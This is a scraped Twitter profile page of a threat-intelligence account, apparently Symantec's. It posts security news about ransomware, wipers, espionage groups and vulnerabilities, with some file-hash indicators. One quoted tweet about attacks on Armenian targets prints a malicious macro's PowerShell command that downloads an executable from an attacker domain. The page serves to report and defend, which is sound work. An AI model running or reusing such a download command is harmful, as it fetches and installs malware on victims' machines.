Threat Intelligence @threatintel Twitter profile

Pinned Tweet

Threat Intelligence

2 days

Why did attackers using tools associated with Chinese #espionage groups compromise a significant number of telcos in one country? Was it information gathering? Eavesdropping? Developing a disruptive capability? Or something else?

0

8

14

Last Seen Profiles

@efathenes

@yamauchi_reina_

@tehetoritehe

@piraeustheatre

@wSLEfeMb6z2mWRo

@ToughCallPod

@alangodooy9

@yuka_ynz

@112oVic2

@DannySweetch

@FilerJackson

@Akhona_PQ

@sugae__99

@QueenBeyisGod

@QJNAJMI

@sbu_kandee

@chdiyufnle25274

@Bender1047616

@AniitaDraw

@homardbouillant

@invomies

@hmaritimemuseum

@Desvicson

@Abang_uWu

@MontokIstri

@jandakembangstw

@temoo_tamam

@ImSatyamdangi

@NRG51628

@Tony_Taylor502

@humphrey_p76207

@NSwerve184446p

@svettelxcrf

@TouseQEXS8v

@stwmaniax

@anistonprvt

Threat Intelligence

@threatintel

2 years

New #wiper malware being used in attacks on #Ukraine 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591

16

500

1K

Threat Intelligence

@threatintel

2 years

NEW: This is Daxin, the most advanced Chinese espionage tool we've ever found. Used to spy on governments worldwide.

10

341

690

Threat Intelligence

@threatintel

7 years

Symantec analysts have confirmed #Petya #ransomware , like #WannaCry , is using #EternalBlue exploit to spread

22

971

486

Threat Intelligence

@threatintel

3 years

Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. #SolarWinds #Raindrop #Sunburst

5

237

384

Threat Intelligence

@threatintel

2 years

Update on #wiper attacks against #ukraine . In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382

Ukraine: Disk-wiping Attacks Precede Russian Invasion

Destructive malware deployed against targets in Ukraine and other countries in the region in the hours prior to invasion.

symantec-enterprise-blogs.security.com

6

145

221

Threat Intelligence

@threatintel

7 years

#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug

6

248

182

Threat Intelligence

@threatintel

7 years

Firefox to become first major browser to block canvas fingerprinting

Firefox 58 to Block Canvas Browser Fingerprinting By Default to Stop Online Tracking

Firefox 58 to Add Built-in HTML5 Canvas Browser Fingerprint Blocker to Stop Users' Online Tracking

thehackernews.com

3

132

174

Threat Intelligence

@threatintel

7 years

New strain of #petya ransomware spreading in Europe. Symantec protects as Ransom.Petya #ransomware

14

320

172

Threat Intelligence

@threatintel

7 years

#Petya checks for preexisting infection by looking for its own filename,usually C:\windows\perfc.Creating this file may help as a killswitch

7

235

163

Threat Intelligence

@threatintel

7 years

Evidence #WannaCry attackers fixed Bitcoin bug & released variant of malware 13 hours after original; but most infections contain flaw

6

181

147

Threat Intelligence

@threatintel

2 years

Interesting detail from our analysis of the decoy ransomware used in #ukraine #wiper attacks. Strings made mocking references to U.S. president Joe Biden.

3

51

123

Threat Intelligence

@threatintel

5 years

Chinese facial recognition company left database exposed online

3

109

96

Threat Intelligence

@threatintel

7 years

#Ransomware unlocks your files for free if you read #cybersecurity articles

This Ransomware Unlocks Your Files For Free If You Read CyberSecurity Articles

A New Koolova Ransomware Unlocks Your Files For Free If You Read CyberSecurity Awareness Articles

thehackernews.com

1

114

89

Threat Intelligence

@threatintel

7 years

#Wannacry can't use unique Bitcoin addresses because of bug, meaning attackers cannot track payment. Users unlikely to get files restored

1

134

86

Threat Intelligence

@threatintel

5 years

German police publish MAC address of parcel bomb suspect's phone, ask public for help

German Police Seek Help In Finding Parcel Bomber With MAC Address

German Police seeks help to gather info related to a MAC address that could lead to the cell phone used by DHL blackmailer who parceled out bombs at different addresses in Brandenburg and Berlin.

thehackernews.com

4

71

73

Threat Intelligence

@threatintel

7 years

BREAKING: New Symantec research reveals stronger links between #Lazarus and #WannaCry

2

106

73

Threat Intelligence

@threatintel

9 months

Our Threat Hunter Team has encountered a new variant of #SiestaGraph , malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)

4

34

72

Threat Intelligence

@threatintel

7 years

Numerous organizations breached in six-year campaign against the energy sector #dragonfly #infosec

1

116

67

Threat Intelligence

@threatintel

7 years

#Petya ransomware outbreak: Here’s what you need to know #infosec #cybersecurity

4

135

65

Threat Intelligence

@threatintel

7 years

Symantec has no evidence of a Wannacry email infection vector and no evidence of a non-killswitch version of the worm. #wannacry #wcry

3

67

66

Threat Intelligence

@threatintel

8 years

#Spam campaign baits users with #Visa rewards emails that spread #TeslaCrypt #ransomware

0

80

25

Threat Intelligence

@threatintel

7 years

BREAKING: First evidence #Vault7 tools were used in known cyberattacks. Targets in 16 countries affected. #Longhorn

2

123

61

Threat Intelligence

@threatintel

7 years

Flaw in ancient MS Office plugin could allow for RCE

17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-11882) Allows Hackers to Install Malware On Windows Computers Without User Interaction

thehackernews.com

7

66

56

Threat Intelligence

@threatintel

2 years

THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4}

2

30

61

Threat Intelligence

@threatintel

2 years

Chinese APT Group #Cicada (aka #APT10 ) Widens Targeting in Recent Espionage Activity - gov orgs and NGOs among targets. Read more: #infosec

2

35

61

Threat Intelligence

@threatintel

7 years

. @Symantec has now blocked 47 million attempted #WannaCry ransomware attacks worldwide. Heat map shows how rapidly the #ransomware spread.

0

72

53

Threat Intelligence

@threatintel

7 years

BREAKING: Symantec has identified further possible links between #LazarusGroup and #wannacry

2

82

48

Threat Intelligence

@threatintel

8 years

Hackers hijack WhatsApp and Telegram accounts using security flaws in Signaling System Number 7 (SS7) protocol

1

76

49

Threat Intelligence

@threatintel

6 years

Symantec uncovers FASTCash malware used by Lazarus group to steal millions from ATMs #LazarusAPT

3

50

43

Threat Intelligence

@threatintel

10 days

Our Threat Hunter Team has found some evidence that attackers linked to Black Basta may have exploited CVE-2024-26169 as a zero-day prior to patching #ZeroDay #Ransomware #BlackBasta

0

31

55

Threat Intelligence

@threatintel

7 years

Heatmap shows how #WannaCry spread across the globe #ransomware #infosec #CyberSecurity

1

96

47

Threat Intelligence

@threatintel

7 years

Two new #wannacry variants found: One had modified killswitch. Second has killswitch disabled, but ransomware payload doesn't execute.

2

78

49

Threat Intelligence

@threatintel

2 years

#Spring4Shell - what you need to know about this new bug. Read more here:

1

16

47

Threat Intelligence

@threatintel

7 years

NEW: If #petya finds certain Norton or Symantec processes running it will not use EternalBlue or EternalRomance to spread

4

49

Threat Intelligence

@threatintel

11 months

Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy ). Recent attack involved modified version of #NightFury backdoor. (1/5)

1

15

47

Threat Intelligence

@threatintel

4 months

Fresh wave of BiBi wiper attacks against Israeli targets this week. Interesting reference in code. #bibwiper (1/2)

2

22

49

Threat Intelligence

@threatintel

7 years

Do you want to work in #cybersecurity ? Read this advice from 15 women working in the industry #infosec #GHC17

1

37

47

Threat Intelligence

@threatintel

6 years

#MobilePrivacy : We tested the top 100 free #Android and #iOS apps. Here's what we found.

1

38

44

Threat Intelligence

@threatintel

8 years

Addicted to #PokemonGO ? Protect your device from scams, malware, and privacy issues:

0

34

42

Threat Intelligence

@threatintel

8 years

Critical Flaws in MySQL Give Hackers Root Access to Server #hacking #exploits #infosec

Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)

Critical Privilege Escalation Flaws in MySQL/Percona/MariaDB Give hackers Root Level Access to Server (Exploits Released)

thehackernews.com

0

86

43

Threat Intelligence

@threatintel

2 years

#Cranefly - Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign #infosec #cybersecurity

0

31

43

Threat Intelligence

@threatintel

4 years

Study reveals that 1 out of every 142 passwords is 123456

2

31

45

Threat Intelligence

@threatintel

5 years

Xiaomi electric scooter vulnerability puts rider safety at risk

Xiaomi Electric Scooters Vulnerable to Life-Threatening Remote Hacks

Cybersecurity researchers have discovered security vulnerability in Xiaomi M365 Electric Scooter that could allow remote hacker to hijack control of the smart vehicle.

thehackernews.com

0

32

45

Threat Intelligence

@threatintel

7 years

Some files locked by #WannaCry can be decrypted, #Symantec analysts found #tech #infosec #cybersecurity

2

82

41

Threat Intelligence

@threatintel

3 years

Side-channel attack can recover encryption keys from Google Titan, YubiKey security keys

1

17

46

Threat Intelligence

@threatintel

4 years

Diebold Nixdorf: New class of ATM 'black box' attacks targeting Europe

Diebold Nixdorf warns of a new class of ATM 'black box' attacks across Europe

New ATM black box (jackpotting) attacks have been spotted in Belgium.

www.zdnet.com

0

27

42

Threat Intelligence

@threatintel

7 years

In-browser #cryptocurrency mining makes an unlikely comeback in 2017 but not everyone is happy. Check out our blog and #infographic for more: #monero #bitcoin #cryptomining

2

95

43

Threat Intelligence

@threatintel

7 years

BREAKING: #Sowbug , previously unknown #cyberespionage group targeting South America and Southeast Asia. #Infosec

2

65

44

Threat Intelligence

@threatintel

9 months

Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: and here ) (1 of 5)

zhixiang hao

@HaoZhixiang

9 months

APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia，There is vba macro code powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe

5

34

96

1

25

43

Threat Intelligence

@threatintel

2 years

New information on #ukraine #wiper attacks. Exploit of Microsoft SQL Server vulnerability (CVE-2021-1636) was used in at least one attack.

Ukraine: Disk-wiping Attacks Precede Russian Invasion

Destructive malware deployed against targets in Ukraine and other countries in the region in the hours prior to invasion.

symantec-enterprise-blogs.security.com

1

24

43

Threat Intelligence

@threatintel

7 years

Android.Doublehidden uses several techniques to hide itself on devices, collect info, display ads

0

29

42

Threat Intelligence

@threatintel

7 years

New type of attack targets fresh installs of WordPress #WordPress

0

39

38

Threat Intelligence

@threatintel

2 years

Trickbot operators retire malware and turn attention to Emotet, BazarLoader

TrickBot gang shuts down botnet after months of inactivity

The operators of the TrickBot malware botnet have shut down their server infrastructure today after months of inactivity, bringing to an end one of the most dangerous and persistent malware operati...

therecord.media

0

26

42

Threat Intelligence

@threatintel

4 years

AlphaBay dark web marketplace moderator sent to prison for 11 years

Colorado Man Sentenced to 11 Years in Prison for Moderating Disputes on Darknet Marketplace AlphaBay

A Colorado man was sentenced today by U.S. District Court Judge Dale A. Drozd to 11 years in prison.

www.justice.gov

1

16

41

Threat Intelligence

@threatintel

4 years

FBI: Iranian hacking group attacking F5 networking devices

4

21

38

Threat Intelligence

@threatintel

7 years

Hundreds of high-profile Twitter accounts hacked through third-party app

3

67

37

Threat Intelligence

@threatintel

8 years

Bangladesh Bank recovers $15m, of $81m stolen in #cyberattack , from a Philippines casino #infosec

SWIFT Hack: Bangladesh Bank Recovers $15 Million from a Philippines Casino

Bangladesh Central Bank has recovered around $15 Million from a chinese junket operator at Philippines Casino

thehackernews.com

0

69

35

Threat Intelligence

@threatintel

7 years

. @Symantec researchers examined if if was possible to find a decryption key to defeat #WannaCry #cybersecurity

Can files locked by WannaCry be decrypted: A technical analysis

Symantec researchers examine if it is possible to decrypt files locked by the WannaCry ransomware.

medium.com

2

43

40

Threat Intelligence

@threatintel

4 years

BLESA: Bluetooth bug affects billions of devices

Billions of devices vulnerable to new 'BLESA' Bluetooth security flaw

New BLESA attack goes after the often ignored Bluetooth reconnection process, unlike previous vulnerabilities, most found in the pairing operation.

www.zdnet.com

3

26

39

Threat Intelligence

@threatintel

2 years

Destructive #wiper attacks precede Russian invasion of #Ukraine . Here's what we know so far:

0

24

39

Threat Intelligence

@threatintel

7 years

Hit me baby one more time: Cyber espionage group hide C&C address in Britney Spears’ Instagram feed

You’ll never guess where Russian spies are hiding their control servers

Turla uses social media and clever programming techniques to cover its tracks.

arstechnica.com

0

34

35

Threat Intelligence

@threatintel

5 years

Nemty ransomware now being spread by the Trik botnet. Find out more:

4

22

36

Threat Intelligence

@threatintel

7 years

#wannacry attackers not giving up on trying to get payments. New message being sent to victims.

6

88

34

Threat Intelligence

@threatintel

7 years

Wannacry victims may be able to recover their files. Further details here:

2

49

36

Threat Intelligence

@threatintel

4 years

Microsoft removed 18 Azure AD apps used by Chinese state-sponsored hackers

0

29

39

Threat Intelligence

@threatintel

5 years

Several Popular Beauty Camera Apps Caught Stealing Users' Photos, Spreading Malicious Ads via @TheHackersNews

Google removed several malicious photo editing and beauty camera Android apps that stole user photos and advertised scams

thehackernews.com

1

49

35

Threat Intelligence

@threatintel

7 years

. @Symantec has confirmed that #BadRabbit uses the #EternalRomance exploit to spread. Read our updated blog:

1

62

36

Threat Intelligence

@threatintel

6 years

Symantec uncovers #Leafminer APT targeting government orgs, businesses in the Middle East since 2017

1

55

37

Threat Intelligence

@threatintel

7 years

All you need to know about the Wannacry Ransomware: #wannacry #wcry #ransomware

5

60

35

Threat Intelligence

@threatintel

6 years

There’s no “I” in Telegram: Dodgy app looks like legitimate version but with some shady extra features

4

42

34

Threat Intelligence

@threatintel

6 years

Working in Cyber Security: “The ability to not shy away from challenges goes a long way in this industry” #infosec #careers #tech

0

20

35

Threat Intelligence

@threatintel

4 years

Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike. Read more: #ransomware #Sodinokibi

0

13

28

Threat Intelligence

@threatintel

2 years

Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: #infosec

1

27

34

Threat Intelligence

@threatintel

7 years

What you need to know about the security of voice-activated smart speakers

0

30

35

Threat Intelligence

@threatintel

5 years

REVEALED: Buckeye espionage outfit was using Equation Group tools at least a year prior to the Shadow Brokers leak. Read more: #apt3 #equation #shadowbrokers

0

40

34

Threat Intelligence

@threatintel

7 years

#Tech : The Incredible Hack: Five of the worst on-screen hacking scenes #hacking #infosec

1

34

Threat Intelligence

@threatintel

4 years

U.S. indicts two hackers for defacing websites after Soleimani killing

Two Alleged Hackers Charged with Defacing Websites Following Killing of Qasem Soleimani

Two alleged computer hackers were indicted in the District of Massachusetts on charges of damaging multiple websites across the United States as retaliation for United States military action in...

www.justice.gov

0

18

32

Threat Intelligence

@threatintel

6 years

Malicious #PowerShell attacks increased by 661 percent from the last half of 2017 to the first half of 2018. Read more in our blog:

0

35

33

Threat Intelligence

@threatintel

6 years

Patch now! Outlook bug lets attackers steal Windows passwords

Flaw in Microsoft Outlook Lets Hackers Easily Steal Your Windows Password

An information disclosure vulnerability (CVE-2018-0950) has been discovered in Microsoft Outlook that could allow hackers to steal Windows users’ login credentials.

thehackernews.com

0

25

32

Threat Intelligence

@threatintel

6 years

Should you be worried about the new #Meltdown and #Spectre vulnerabilities? Here's what you need to know:

0

38

32

Threat Intelligence

@threatintel

7 years

Symantec can confirm that MEDoc software was used to seed initial infections of #petya ransomware

0

54

32

Threat Intelligence

@threatintel

6 years

. @Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia

1

42

31

Threat Intelligence

@threatintel

7 years

Service claims to have access to SS7 network, charging $500 to track phones, intercept calls, texts

1

43

32

Threat Intelligence

@threatintel

6 years

Patch now! Oracle fixes a record 334 vulnerabilities in July patch update

2

43

31

Threat Intelligence

@threatintel

7 years

Malware used in watering hole attacks on Polish banks has tentative links to #Lazarus group

0

82

31

Threat Intelligence

@threatintel

7 years

#IoT has been one of the big areas of concern in #cybersecurity in recent times. Read about it in #ISTR17

0

43

27

Threat Intelligence

@threatintel

7 years

Nine payments have been made into #Bitcoin wallet associated with #Petya so far #ransomware #infosec

1

47

30

Threat Intelligence

@threatintel

2 years

Governments in Asia subjected to ongoing espionage campaign by attackers previously linked to #ShadowPad Trojan. #APT #Cyberespionage

0

23

27

Threat Intelligence

@threatintel

4 years

UPDATE on our #WastedLocker investigation. Dozens of US newspaper websites owned by the same parent company were compromised by attackers in order to infect potential targets. Symantec has notified the company and it has now removed the malicious code.

WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations

Attackers were preparing to attack dozens of U.S. corporations, including eight Fortune 500 companies.

symantec-enterprise-blogs.security.com

1

22

28

Threat Intelligence

@threatintel

5 years

NEW: Symantec finds evidence #Waterbug attackers may have hijacked a separate espionage group’s infrastructure during attack on target in Middle East. #Turla #Crambus #Oilrig

1

34

31

Threat Intelligence

@threatintel

2 years

North Korean tech freelancers are earning money for authoritarian government

0

15

30

Threat Intelligence

@threatintel

6 years

Meet #Thrip , an espionage group currently targeting satellite communications, telecoms, and defense companies in the U.S. and SE Asia

3

44

30

Threat Intelligence

@threatintel

7 years

Here's what you need to know about the #KRACKs #WPA2 WI-Fi #vulnerability #infosec

0

44

31

Threat Intelligence

@threatintel

4 years

#CyberCrime - Attacks from Malicious IP Hit Multiple Machines in Several Countries #infosec #research

0

25

28

Threat Intelligence

@threatintel

1 year

#NEW - #Graphican - #Flea ( #APT15 ) Uses New Tool in Attacks Targeting Foreign Ministries - backdoor leverages Microsoft Graph API for C&C communication.

0

20

28

Threat Intelligence

@threatintel

6 years

The A to Z of cyber security: From #BEC scams, to DDoS attacks, and #WannaCry . Read our brief guide to the world of #cybersecurity

0

13

27

Threat Intelligence

@threatintel

6 years

Think everyone who works in #infosec has been hacking since they were a kid? Not necessarily: Working in Cyber Security: “I didn’t have any interest in computers when I was in school” #careeradvice